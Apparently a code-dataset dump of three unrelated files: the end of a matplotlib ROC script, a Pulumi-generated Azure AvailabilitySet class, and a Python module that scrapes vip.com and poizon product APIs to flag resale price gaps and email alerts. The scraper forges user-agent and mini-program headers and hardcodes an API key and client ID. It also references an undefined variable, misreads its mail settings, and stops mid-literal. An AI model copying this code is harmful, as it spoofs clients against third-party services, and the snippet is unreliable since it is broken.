plt.savefig('ROC'+str(number_of_features)+'.png',dpi=200)
plt.show()
| [
"noreply@github.com"
] | Luiscn.noreply@github.com |
b3cf3a9f9a3615ad902926a49be6cbf5d61fa253 | 5e6d8b9989247801718dd1f10009f0f7f54c1eb4 | /sdk/python/pulumi_azure_native/compute/availability_set.py | 5b77516e40d5119864dee8097599203fac648887 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vivimouret29/pulumi-azure-native | d238a8f91688c9bf09d745a7280b9bf2dd6d44e0 | 1cbd988bcb2aa75a83e220cb5abeb805d6484fce | refs/heads/master | 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,431 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['AvailabilitySetArgs', 'AvailabilitySet']
@pulumi.input_type
class AvailabilitySetArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
availability_set_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
platform_fault_domain_count: Optional[pulumi.Input[int]] = None,
platform_update_domain_count: Optional[pulumi.Input[int]] = None,
proximity_placement_group: Optional[pulumi.Input['SubResourceArgs']] = None,
sku: Optional[pulumi.Input['SkuArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machines: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]] = None):
"""
The set of arguments for constructing a AvailabilitySet resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] availability_set_name: The name of the availability set.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[int] platform_fault_domain_count: Fault Domain count.
:param pulumi.Input[int] platform_update_domain_count: Update Domain count.
:param pulumi.Input['SubResourceArgs'] proximity_placement_group: Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
:param pulumi.Input['SkuArgs'] sku: Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
:param pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]] virtual_machines: A list of references to all virtual machines in the availability set.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if availability_set_name is not None:
pulumi.set(__self__, "availability_set_name", availability_set_name)
if location is not None:
pulumi.set(__self__, "location", location)
if platform_fault_domain_count is not None:
pulumi.set(__self__, "platform_fault_domain_count", platform_fault_domain_count)
if platform_update_domain_count is not None:
pulumi.set(__self__, "platform_update_domain_count", platform_update_domain_count)
if proximity_placement_group is not None:
pulumi.set(__self__, "proximity_placement_group", proximity_placement_group)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if virtual_machines is not None:
pulumi.set(__self__, "virtual_machines", virtual_machines)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="availabilitySetName")
def availability_set_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the availability set.
"""
return pulumi.get(self, "availability_set_name")
@availability_set_name.setter
def availability_set_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "availability_set_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="platformFaultDomainCount")
def platform_fault_domain_count(self) -> Optional[pulumi.Input[int]]:
"""
Fault Domain count.
"""
return pulumi.get(self, "platform_fault_domain_count")
@platform_fault_domain_count.setter
def platform_fault_domain_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "platform_fault_domain_count", value)
@property
@pulumi.getter(name="platformUpdateDomainCount")
def platform_update_domain_count(self) -> Optional[pulumi.Input[int]]:
"""
Update Domain count.
"""
return pulumi.get(self, "platform_update_domain_count")
@platform_update_domain_count.setter
def platform_update_domain_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "platform_update_domain_count", value)
@property
@pulumi.getter(name="proximityPlacementGroup")
def proximity_placement_group(self) -> Optional[pulumi.Input['SubResourceArgs']]:
"""
Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
"""
return pulumi.get(self, "proximity_placement_group")
@proximity_placement_group.setter
def proximity_placement_group(self, value: Optional[pulumi.Input['SubResourceArgs']]):
pulumi.set(self, "proximity_placement_group", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
"""
Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="virtualMachines")
def virtual_machines(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]:
"""
A list of references to all virtual machines in the availability set.
"""
return pulumi.get(self, "virtual_machines")
@virtual_machines.setter
def virtual_machines(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]):
pulumi.set(self, "virtual_machines", value)
class AvailabilitySet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
availability_set_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
platform_fault_domain_count: Optional[pulumi.Input[int]] = None,
platform_update_domain_count: Optional[pulumi.Input[int]] = None,
proximity_placement_group: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machines: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
__props__=None):
"""
Specifies information about the availability set that the virtual machine should be assigned to. Virtual machines specified in the same availability set are allocated to different nodes to maximize availability. For more information about availability sets, see [Manage the availability of virtual machines](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-manage-availability?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json). <br><br> For more information on Azure planned maintenance, see [Planned maintenance for virtual machines in Azure](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-planned-maintenance?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json) <br><br> Currently, a VM can only be added to availability set at creation time. An existing VM cannot be added to an availability set.
API Version: 2020-12-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] availability_set_name: The name of the availability set.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[int] platform_fault_domain_count: Fault Domain count.
:param pulumi.Input[int] platform_update_domain_count: Update Domain count.
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] proximity_placement_group: Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[pulumi.InputType['SkuArgs']] sku: Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]] virtual_machines: A list of references to all virtual machines in the availability set.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AvailabilitySetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Specifies information about the availability set that the virtual machine should be assigned to. Virtual machines specified in the same availability set are allocated to different nodes to maximize availability. For more information about availability sets, see [Manage the availability of virtual machines](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-manage-availability?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json). <br><br> For more information on Azure planned maintenance, see [Planned maintenance for virtual machines in Azure](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-planned-maintenance?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json) <br><br> Currently, a VM can only be added to availability set at creation time. An existing VM cannot be added to an availability set.
API Version: 2020-12-01.
:param str resource_name: The name of the resource.
:param AvailabilitySetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AvailabilitySetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
availability_set_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
platform_fault_domain_count: Optional[pulumi.Input[int]] = None,
platform_update_domain_count: Optional[pulumi.Input[int]] = None,
proximity_placement_group: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machines: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AvailabilitySetArgs.__new__(AvailabilitySetArgs)
__props__.__dict__["availability_set_name"] = availability_set_name
__props__.__dict__["location"] = location
__props__.__dict__["platform_fault_domain_count"] = platform_fault_domain_count
__props__.__dict__["platform_update_domain_count"] = platform_update_domain_count
__props__.__dict__["proximity_placement_group"] = proximity_placement_group
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
__props__.__dict__["virtual_machines"] = virtual_machines
__props__.__dict__["name"] = None
__props__.__dict__["statuses"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20150615:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20150615:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20160330:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20160330:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20160430preview:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20160430preview:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20170330:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20170330:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20171201:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20171201:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20180401:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20180401:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20180601:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20180601:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20181001:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20181001:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20190301:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20190701:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20191201:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20191201:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20200601:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20200601:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20201201:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20201201:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20210301:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20210301:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20210401:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20210401:AvailabilitySet"), pulumi.Alias(type_="azure-native:compute/v20210701:AvailabilitySet"), pulumi.Alias(type_="azure-nextgen:compute/v20210701:AvailabilitySet")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(AvailabilitySet, __self__).__init__(
'azure-native:compute:AvailabilitySet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'AvailabilitySet':
"""
Get an existing AvailabilitySet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = AvailabilitySetArgs.__new__(AvailabilitySetArgs)
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["platform_fault_domain_count"] = None
__props__.__dict__["platform_update_domain_count"] = None
__props__.__dict__["proximity_placement_group"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["statuses"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["virtual_machines"] = None
return AvailabilitySet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="platformFaultDomainCount")
def platform_fault_domain_count(self) -> pulumi.Output[Optional[int]]:
"""
Fault Domain count.
"""
return pulumi.get(self, "platform_fault_domain_count")
@property
@pulumi.getter(name="platformUpdateDomainCount")
def platform_update_domain_count(self) -> pulumi.Output[Optional[int]]:
"""
Update Domain count.
"""
return pulumi.get(self, "platform_update_domain_count")
@property
@pulumi.getter(name="proximityPlacementGroup")
def proximity_placement_group(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
"""
Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
"""
return pulumi.get(self, "proximity_placement_group")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
"""
Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def statuses(self) -> pulumi.Output[Sequence['outputs.InstanceViewStatusResponse']]:
"""
The resource status information.
"""
return pulumi.get(self, "statuses")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualMachines")
def virtual_machines(self) -> pulumi.Output[Optional[Sequence['outputs.SubResourceResponse']]]:
"""
A list of references to all virtual machines in the availability set.
"""
return pulumi.get(self, "virtual_machines")
| [
"noreply@github.com"
] | vivimouret29.noreply@github.com |
155b52bb1a9e4aa73afd62fa8af025b4d0842a30 | 5df42e7af528a6d56639c9359459fb58f07d0626 | /wolf_outer/spider_bases/utils.py | 965dce98bbae90ca92d25a7aee0fe0a17896b64f | [] | no_license | nwaiting/wolf-ai | 63487fc7dd297f6b0fb6116788db369f2ea7ff2e | 6ec93de254f081b41fec86078ac1fc9122cbddd5 | refs/heads/master | 2021-06-09T00:26:06.698516 | 2021-03-30T01:13:45 | 2021-03-30T01:13:45 | 86,796,641 | 7 | 10 | null | null | null | null | UTF-8 | Python | false | false | 58,694 | py | import threading
import logging
import datetime
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import json
import requests
import random
import hashlib
from .config import mobile_user_agents
from .sqlmodel import SqlModel
logger = logging.getLogger(__file__)
def to_int(v, default=0):
try:
return int(v)
except:
return default
def to_float(v, default=0.0):
try:
return float(v)
except:
return default
class SendMail(object):
@staticmethod
def send(mail_configs, text):
_mail_content_type = mail_configs["mail_type"]
_mail_header_from = mail_configs["GoodsInfoJd"]
_mail_header_to = mail_configs["GoodsInfoJd"]
_mail_header_subject = mail_configs["GoodsInfoJd"]
_mail_host = mail_configs["mail_host"]
_mail_pwd = mail_configs["mail_pwd"]
_mail_sender = mail_configs["mail_sender"]
_mail_receivers = mail_configs["mail_receivers"]
message = MIMEText(text, _mail_content_type, 'utf-8')
message['From'] = Header(_mail_header_from, 'utf-8')
message['To'] = Header(_mail_header_to, 'utf-8')
message['Subject'] = Header(_mail_header_subject, 'utf-8')
try:
smtpObj = smtplib.SMTP_SSL(_mail_host, 465)
smtpObj.login(_mail_sender, _mail_pwd)
smtpObj.sendmail(_mail_sender, _mail_receivers, message.as_string())
smtpObj.quit()
except smtplib.SMTPException as e:
logger.error('send {} mail error {}'.format(_mail_receivers, e))
else:
logger.info("send {} email success".format(_mail_receivers))
class MailNotify(threading.Thread):
def __init__(self, _dbhost, _dbport, _dbuser, _dbpwd, _db, _mail_host, _mail_pass,
_sender, _receivers, _params, _sleep=30):
self.dbhost = _dbhost
self.dbport = _dbport
self.dbuser = _dbuser
self.dbpwd = _dbpwd
self.db = _db
self.mail_host = _mail_host
self.mail_pass = _mail_pass
self.sender = _sender
self.receivers = _receivers
self.params = _params
self.last_list = set()
self.lowprice_last_list = set()
self.last_discount_list = set()
self.sleep = _sleep
self.sql = SqlModel(_dbhost, _dbport, _dbuser, _dbpwd, _db)
super(MailNotify, self).__init__()
def get_mail_config(self):
return {}
def send(self, send_list, header=None):
send_str_list = []
for it in send_list:
tmp_str = """<p>name: {},id: {} delta:{},price:{}/{}({}),du:{}/{},extern:{},new:{},sold:{} <a href={}>{}</a>
<a href={}>(详情)</a></p>""".format(it['source'],it['good_id'],it['delta'],
it['price'],it['marketPrice'],it['saleDiscount'],
it['du_price'],it['du_count'],it['source_extern'],
it.get('new', 0),
it['sold_items'],it['pic'],it['title'],it['detail'])
send_str_list.append(tmp_str)
if header:
contents = "<h3>{}</h3>".format(header) + ''.join(send_str_list)
else:
contents = ''.join(send_str_list)
SendMail.send(self.get_mail_config(), contents)
def get_list(self, price_delta, count_delta, limit=0, size=50):
now_day = datetime.datetime.now().strftime('%Y-%m-%d')
sql = 'select title,good_id,saleDiscount,detail,pic,price,du_price,marketPrice,du_count,source_extern,' \
'`source`,extern,sold_items,updated_date,updated_day from tb_goods ' \
'where du_price-price>=%s and du_count>%s and updated_day=%s order by updated_ts desc limit %s,%s'
res = self.sql.execute(sql, [price_delta, count_delta, now_day, limit, size])
for d in res:
d['delta'] = d['du_price'] - d['price']
return res
def get_discount_list(self, max_discount, min_marketPrice, limit=0, size=50):
now_day = datetime.datetime.now().strftime('%Y-%m-%d')
sql = 'select title,good_id,saleDiscount,discount,detail,pic,price,du_price,marketPrice,du_count,source_extern,' \
'`source`,extern,sold_items,updated_date,updated_day from tb_goods ' \
'where discount<%s and marketPrice>%s and updated_day=%s order by updated_ts desc limit %s,%s'
res = self.sql.execute(sql, [max_discount, min_marketPrice, now_day, limit, size])
for d in res:
d['delta'] = d['du_price'] - d['price']
res.sort(key=lambda x:x['discount'], reverse=False)
return res
def run(self):
logger.info("start thread {}".format(self.__class__))
now_day = datetime.datetime.now().strftime("%Y-%m-%d")
while True:
res = self.get_list(self.params.get('delta', 50), self.params.get('delta_count', 500), size=200)
is_send = False
for it in res:
tmp_key = "{}_{}".format(it['good_id'], it['price'])
if tmp_key not in self.last_list:
self.last_list.add(tmp_key)
it['new'] = 1
is_send = True
if is_send:
res.sort(key=lambda x: (x.get('new', 0), x['delta']), reverse=True)
self.send(res[:100])
res = self.get_list(self.params.get('lowprice_delta', 200), self.params.get('lowprice_delta_count', 50), size=200)
is_send = False
for it in res:
tmp_key = "{}_{}".format(it['good_id'], it['price'])
if tmp_key not in self.lowprice_last_list:
self.lowprice_last_list.add(tmp_key)
it['new'] = 1
is_send = True
if is_send:
res.sort(key=lambda x: (x.get('new', 0), x['delta']), reverse=True)
self.send(res[:100], 'lowprice')
# res = self.get_discount_list(self.params.get('discount', 3), self.params.get('discount_count', 500))
# is_send = False
# for it in res:
# tmp_key = "{}_{}".format(it['good_id'], it['price'])
# if tmp_key not in self.last_discount_list:
# self.last_discount_list.add(tmp_key)
# it['new'] = 1
# is_send = True
# if is_send:
# self.send(res, 'discount')
time.sleep(self.sleep)
if now_day != datetime.datetime.now().strftime("%Y-%m-%d"):
self.last_list = set()
self.lowprice_last_list = set()
now_day = datetime.datetime.now().strftime("%Y-%m-%d")
class GoodDetailGet(threading.Thread):
def __init__(self, task_q, result_q, sleep=4):
self.task_queue = task_q
self.result_queue = result_q
self.sleep =sleep
super(GoodDetailGet, self).__init__()
def get_headers(self):
return {
"user-agent": random.choice(mobile_user_agents),
"referer": "https://list.vip.com/"
}
def get_sold_detail(self, productId):
url = 'https://stock.vip.com/detail/'
params = {
"callback": "stock_detail",
"merchandiseId": productId,
"is_old": "0",
"areaId": "103101",
"_": "{}".format(int(time.time() * 1000))
}
r = []
try:
res = requests.get(url, headers=self.get_headers(), params=params, timeout=5)
contents = res.text.replace("stock_detail(", '').strip('\r\n ')[:-1]
c2 = json.loads(contents)
for it in c2['items']:
if int(it.get('stock', 0)) > 0:
r.append({
it['name']: it['stock']
})
return json.dumps(r)
except Exception as e:
logger.error("get_sold_detail {}={}={}".format(url, productId, e))
return json.dumps(r)
def get_detail(self, productId, api_key='70f71280d5d547b2a7bb370a529aeea1'):
url = 'https://mapi.vip.com/vips-mobile/rest/shopping/pc/product/detail/v5'
params = {
"callback": "detailInfoCB",
"app_name": "shop_pc",
"app_version": "4.0",
"warehouse": "VIP_SH",
"fdc_area_id": "103101101",
"client": "pc",
"mobile_platform": "1",
"province_id": "103101",
"api_key": "{}".format(api_key),
"user_id": "",
"mars_cid": "1604906927034_08fa7a00d3c9cd0288978fe43e69bb46",
"wap_consumer": "a",
"productId": "{}".format(productId),
"functions": "brand_store_info,newBrandLogo,hideOnlySize,extraDetailImages,sku_price,ui_settings",
"kfVersion": "1",
"highlightBgImgVer": "1",
"is_get_TUV": "1",
"commitmentVer": "2",
"haitao_description_fields": "text",
"supportSquare": "1",
"longTitleVer": "2",
"propsVer": "1"
}
try:
res = requests.get(url, headers=self.get_headers(), params=params, timeout=5)
contents = res.text.replace('detailInfoCB(', '').strip('\r\n ')[:-1]
c = json.loads(contents)
return c['data']['product']['merchandiseSn']
except Exception as e:
logger.error("get_detail {}={}={}".format(url, productId, e))
return ''
def run(self):
logger.info("start thread {}".format(self.__class__))
statistic_count = 0
while True:
if self.task_queue.empty():
time.sleep(1)
continue
items = self.task_queue.get()
db_id, product_id = items[0], items[1]
good_id = self.get_detail(product_id)
sold_items = self.get_sold_detail(product_id)
self.result_queue.put((db_id, good_id, sold_items))
statistic_count += 1
if statistic_count % 100 == 0:
logger.info("{} done {}, current {}:{}".format(self.__class__, statistic_count,
self.task_queue.qsize(), self.result_queue.qsize()))
time.sleep(random.uniform(0, self.sleep))
class DuGet(threading.Thread):
def __init__(self, task_q, results_q, sleep=4):
self.task_queue = task_q
self.results_queue = results_q
self.sleep = sleep
self.headers = {
'Host': "app.poizon.com",
'User-Agent': "{} MicroMessenger/7.0.4.501 NetType/WIFI MiniProgramEnv/Windows WindowsWechat".format(random.choice(user_agent_list)),
'appid': "wxapp",
'appversion': "4.4.0",
'content-type': "application/json",
'Accept-Encoding': "gzip, deflate, br",
'Accept': "*/*",
}
index_load_more_url = 'https://app.poizon.com/api/v1/h5/index/fire/index'
# {"sign":"5e22051c5156608a85b12d501d615c61","tabId":"","limit":20,"lastId":1}
recensales_load_more_url = 'https://app.poizon.com/api/v1/h5/commodity/fire/last-sold-list'
# {"sign":"f44e26eb08becbd16b7ed268d83b3b8c","spuId":"73803","limit":20,"lastId":"","sourceApp":"app"}
product_detail_url = 'https://app.poizon.com/api/v1/h5/index/fire/flow/product/detail'
# {"sign":"5721d19afd7a7891b627abb9ac385ab0","spuId":"49413","productSourceName":"","propertyValueId":"0"}
category = {"code":200,"msg":"success","data":{"list":[{"catId":0,"catName":"品牌"},{"catId":1,"catName":"系列"},{"catId":3,"catName":"球鞋"},{"catId":6,"catName":"潮搭"},{"catId":8,"catName":"手表"},{"catId":1000119,"catName":"配件"},{"catId":7,"catName":"潮玩"},{"catId":9,"catName":"数码"},{"catId":1000008,"catName":"家电"},{"catId":726,"catName":"箱包"},{"catId":587,"catName":"美妆"},{"catId":945,"catName":"家居"}]},"status":200}
doCategoryDetail = {"code":200,"msg":"success","data":{"list":[{"brand":{"goodsBrandId":144,"brandName":"Nike","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3724byte_94276b9b2c7361e9fa70da69894d2e91_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":13,"brandName":"Jordan","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3173byte_5c87bdf672c1b1858d994e281ce5f154_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":3,"brandName":"adidas","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24108byte_fc70f4c88211e100fe6c29a6f4a46a96_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":494,"brandName":"adidas originals","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24706byte_9802f5a4f25e6cd1b284a5b754cec4f0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":439,"brandName":"Supreme","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6426byte_c7ab640bf99963bfc2aff21ca4ff8322_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":79,"brandName":"GUCCI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25670byte_c9ca8b5347750651bebbf84dd7d12d01_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10359,"brandName":"Fear of God","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17196byte_d5f7a627b65e90f6b850b613c14b54a2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10176,"brandName":"LOUIS VUITTON","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33190byte_d14f21356f020e12a534b967be2bed77_w382h322.png"},"seriesList":[]},{"brand":{"goodsBrandId":1245,"brandName":"OFF-WHITE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte2408byte_4d329f274512ddb136989432292cdd3f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":45,"brandName":"THE NORTH FACE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31268byte_e05935a55a37e7901640f7d09548499d_w151h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10082,"brandName":"FOG","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23329byte_3e247b5d598f7da36a1af24d08cb9ad8_w350h350.png"},"seriesList":[]},{"brand":{"goodsBrandId":10215,"brandName":"STONE ISLAND","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24302byte_570d51bb8c62233c3b52a9ffb05e5d74_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10223,"brandName":"HERMES","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30429byte_658ec36fbe99d2b3ae1e5a685ee1b20c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10370,"brandName":"Jimmy 